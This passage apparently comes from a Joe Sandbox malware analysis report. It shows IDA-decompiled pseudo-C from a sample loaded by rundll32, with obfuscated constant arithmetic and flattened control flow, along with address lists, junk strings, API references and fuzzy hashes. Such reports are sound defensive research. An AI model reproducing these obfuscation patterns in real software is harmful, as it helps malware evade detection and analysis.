				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E0034CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E0035C3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E00347B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E00347C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E00359E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E003446BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0034219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}

0x00349714
0x00349717
0x0034971c
0x00349724
0x0034972c
0x00349734
0x0034973c
0x00349745
0x00349749
0x0034974b
0x00349752
0x0034975a
0x0034975c
0x00349764
0x00349769
0x00349771
0x00349779
0x00349781
0x00349789
0x00349791
0x00349799
0x003497a1
0x003497a6
0x003497ae
0x003497b6
0x003497be
0x003497c6
0x003497ce
0x003497d6
0x003497e4
0x003497e9
0x003497f4
0x003497f7
0x003497fb
0x00349803
0x00349813
0x0034981c
0x0034981f
0x0034982b
0x0034982f
0x00349837
0x0034983f
0x00349844
0x00349850
0x00349853
0x00349857
0x0034985f
0x00349867
0x0034986f
0x00349877
0x0034987f
0x00349887
0x0034988f
0x00349897
0x0034989f
0x003498a7
0x003498ac
0x003498b1
0x003498b9
0x003498c1
0x003498c9
0x003498d3
0x003498e0
0x003498e8
0x003498f0
0x003498f8
0x00349907
0x0034990a
0x0034990e
0x00349916
0x00349923
0x00349927
0x0034992f
0x00349937
0x0034993f
0x00349947
0x0034994f
0x00349957
0x0034995f
0x00349967
0x0034996f
0x0034997f
0x00349983
0x0034998b
0x00349993
0x0034999b
0x003499a7
0x003499ac
0x003499b2
0x003499ba
0x003499c2
0x003499ce
0x003499d1
0x003499d5
0x003499dd
0x003499ea
0x003499ee
0x003499f6
0x003499fe
0x00349a06
0x00349a0e
0x00349a13
0x00349a18
0x00349a20
0x00349a28
0x00349a30
0x00349a38
0x00349a40
0x00349a48
0x00349a4d
0x00349a55
0x00349a55
0x00349a55
0x00349a5a
0x00000000
0x00349a5a
0x00349a6c
0x00349b32
0x00349b36
0x00349b3b
0x00349b3e
0x00349b41
0x00349b45
0x00349b4a
0x00000000
0x00349b4a
0x00349a78
0x00349ac5
0x00349ad8
0x00349add
0x00349ae0
0x00349ae3
0x00349ae5
0x00349afd
0x00349b02
0x00349b05
0x00349b09
0x00349b11
0x00349b15
0x00349b1a
0x00349b1d
0x00000000
0x00349b1d
0x00349a7a
0x00349a7c
0x00000000
0x00349b7a
0x00349a84
0x00000000
0x00349a8a
0x00349aae
0x00349ab3
0x00349ab6
0x00349abb
0x00349ac1
0x00349a55
0x00349a55
0x00349a55
0x00000000
0x00349a55
0x00349a55
0x00349abb
0x00349a84
0x00349b82
0x00349b82
0x00349b52
0x00349b57
0x00349b57
0x00349b57
0x00000000
0x00349a5a

Strings

3`S, xrefs: 003497FB
'|6, xrefs: 003499D5
$2, xrefs: 00349993
pj, xrefs: 0034986F
8, xrefs: 0034987F
DT%1, xrefs: 00349791
8pM, xrefs: 0034993F
kE3Q, xrefs: 0034973C
k l, xrefs: 00349857
q, xrefs: 0034985F
>yhM, xrefs: 00349A4D

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
API String ID: 0-1622084174
Opcode ID: 0ebda5304ff349f55af7f8eb5a452122148a33d0c9f32ad93c1115872dd07f5d
Instruction ID: 74a29f27e0fe490807ef8115992228e2362fc21b903535fc8f507fc0277a3cfb
Opcode Fuzzy Hash: 0ebda5304ff349f55af7f8eb5a452122148a33d0c9f32ad93c1115872dd07f5d
Instruction Fuzzy Hash: 8EB12F729083419FC398CF25D58A90BFBE1FBC4758F40891DF59A9A220D3B5D959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 003464E2 Relevance: 12.9, Strings: 10, Instructions: 358
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003464E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E00350AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E003480E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E00358519(_v360, _v348, _v292);
								E00358519(_v352, _v388, _t422);
								E00358519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E00344B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E0035F435( &_v292,  &_v284);
								} else {
									_t359 = E0035A666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x363e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x363e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x363e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E00358519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x363e08; // 0x0
							_t338 =  *0x363e08; // 0x0
							_t343 =  *0x363e08; // 0x0
							_t345 = E0035E395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E00345548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E0034CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}

0x003464ec
0x003464f3
0x003464f5
0x003464fc
0x00346503
0x0034650a
0x00346511
0x00346518
0x00346519
0x0034651a
0x0034651f
0x00346527
0x0034652a
0x00346537
0x0034653f
0x00346541
0x00346549
0x0034654e
0x00346556
0x0034655e
0x00346566
0x00346574
0x00346579
0x0034657f
0x00346587
0x00346592
0x0034659a
0x003465a5
0x003465b2
0x003465b5
0x003465b9
0x003465c1
0x003465c9
0x003465d1
0x003465d9
0x003465e1
0x003465e6
0x003465ee
0x003465f6
0x003465fe
0x00346606
0x0034660e
0x00346616
0x0034661e
0x00346626
0x00346636
0x0034663a
0x00346642
0x0034664a
0x00346652
0x0034665a
0x00346662
0x00346674
0x00346677
0x0034667b
0x00346683
0x0034668b
0x00346690
0x00346698
0x003466a0
0x003466a8
0x003466b0
0x003466b8
0x003466c0
0x003466c8
0x003466d2
0x003466da
0x003466e2
0x003466ea
0x003466ef
0x003466f4
0x003466fc
0x00346704
0x00346712
0x00346717
0x0034671d
0x00346722
0x0034672a
0x00346732
0x0034673a
0x00346742
0x0034674a
0x00346757
0x0034675a
0x0034675e
0x00346766
0x0034676e
0x00346776
0x00346783
0x00346787
0x0034678f
0x00346797
0x0034679f
0x003467a7
0x003467af
0x003467b7
0x003467bf
0x003467c7
0x003467cf
0x003467d7
0x003467df
0x003467e7
0x003467ef
0x003467f7
0x003467ff
0x00346804
0x0034680c
0x00346814
0x0034681c
0x00346824
0x00346829
0x00346831
0x00346839
0x00346841
0x00346846
0x0034684e
0x00346856
0x0034685e
0x00346863
0x0034686b
0x00346873
0x0034687d
0x00346881
0x00346889
0x00346899
0x003468a1
0x003468a6
0x003468b0
0x003468b3
0x003468b7
0x003468bb
0x003468c3
0x003468c7
0x003468d2
0x003468dd
0x003468e8
0x003468f5
0x003468f9
0x00346901
0x00346909
0x0034690e
0x00346916
0x00346916
0x00346916
0x0034691b
0x0034691b
0x0034691b
0x0034691b
0x0034691d
0x00000000
0x00000000
0x00346923
0x00346a56
0x00346a5b
0x00346a6d
0x00346a72
0x00346a73
0x00346a75
0x00346a7a
0x00346a7d
0x00346916
0x00346916
0x00346916
0x00000000
0x00346916
0x00346916
0x0034692f
0x00346a16
0x00346a25
0x00346a3d
0x00346a43
0x00346bc8
0x00346bc8
0x00000000
0x00346bc8
0x0034693b
0x003469d8
0x003469da
0x003469df
0x003469e6
0x003469ed
0x003469f4
0x003469fd
0x00346916
0x00346916
0x00346916
0x00000000
0x00346916
0x00346916
0x00346947
0x00346999
0x003469a9
0x0034699b
0x0034699b
0x0034699b
0x003469ae
0x003469b7
0x003469bc
0x00000000
0x003469bc
0x0034694f
0x00000000
0x00000000
0x00346955
0x0034695e
0x00346960
0x00346963
0x00346966
0x0034696b
0x00346970
0x00346970
0x00346973
0x0034697a
0x00346bdb
0x00346be1
0x00346be8
0x00346bf1
0x00346980
0x00346980
0x00346916
0x00346916
0x00346916
0x00000000
0x00346916
0x00346916
0x0034697a
0x00346a8d
0x00346bbd
0x00346bc3
0x00000000
0x00346bc3
0x00346a99
0x00346b34
0x00346b4c
0x00346b7d
0x00346b89
0x00346b8e
0x00346b93
0x00346b9f
0x00346ba4
0x00346b95
0x00346b95
0x00346b95
0x00346916
0x00346916
0x00346916
0x00000000
0x00346916
0x00346916
0x00346aa5
0x00346b0f
0x00346b14
0x00346b19
0x00346b25
0x00346b1b
0x00346b1d
0x00346b22
0x00346b22
0x00346b2a
0x00346916
0x00346916
0x00346916
0x00000000
0x00346916
0x00346916
0x00346aad
0x00000000
0x00000000
0x00346ad6
0x00346adb
0x00346ae0
0x00000000
0x00000000
0x00346ae6
0x00000000
0x00346bcd
0x00346bcd
0x00000000
0x00346bd9

Strings

YN, xrefs: 0034680C
%}, xrefs: 00346814
KL?, xrefs: 00346616
[, xrefs: 003468DD
[, xrefs: 0034666D
?M\, xrefs: 003467E7
Ty, xrefs: 00346A7D
bN-j, xrefs: 0034675E
W3pR, xrefs: 003466B0
Ty, xrefs: 00346A93

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
API String ID: 0-2895984816
Opcode ID: 37dbb2d7817880b76eaec9137b85935f7572d1e23d163fc6619b4897e18f3fda
Instruction ID: aa45133166312bbe132d88ae3c22d384f71c4eccff72a2eac51b4adf011fb95f
Opcode Fuzzy Hash: 37dbb2d7817880b76eaec9137b85935f7572d1e23d163fc6619b4897e18f3fda
Instruction Fuzzy Hash: DE0245725083809FD7A9CF65C586A5BBBE1FB85318F10890DF5DA8A260D7B0D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10021873
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

PathIsUNCA.SHLWAPI(?), ref: 100218FE
GetVolumeInformationA.KERNEL32 ref: 1002191C
CharUpperA.USER32 ref: 10021943
FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
FindClose.KERNEL32(00000000), ref: 10021960
lstrlenA.KERNEL32(?), ref: 10021975

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 3249967234-0
Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00345E60 Relevance: 11.6, Strings: 9, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00345E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E003520B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
